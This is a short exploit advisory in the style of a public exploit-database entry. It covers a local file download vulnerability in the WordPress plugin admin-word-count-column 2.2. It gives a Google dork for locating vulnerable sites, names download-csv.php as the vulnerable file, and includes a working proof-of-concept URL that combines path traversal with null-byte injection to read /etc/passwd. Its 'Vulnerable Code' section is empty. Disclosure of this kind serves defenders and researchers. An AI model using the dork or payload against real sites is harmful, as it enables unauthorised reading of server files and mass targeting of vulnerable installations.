# Exploit Title: WordPress Plugin admin-word-count-column 2.2 - Local File Download # Google Dork: inurl:/wp-content/plugins/admin-word-count-column/ # Date: 27-03-2022 # Exploit Author: Hassan Khan Yusufzai - Splint3r7 # Vendor Homepage: https://wordpress.org/plugins/admin-word-count-column/ # Version: 2.2 # Contact me: h [at] spidersilk.com # PHP version: 5.3.2 or below # Vulnerable File: plugins/admin-word-count-column/download-csv.php # Vulnerable Code: ``` ``` # Proof of Concept: localhost/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\0 Note: Null byte injection will only working in php 5.3.2 and below 5.3.2.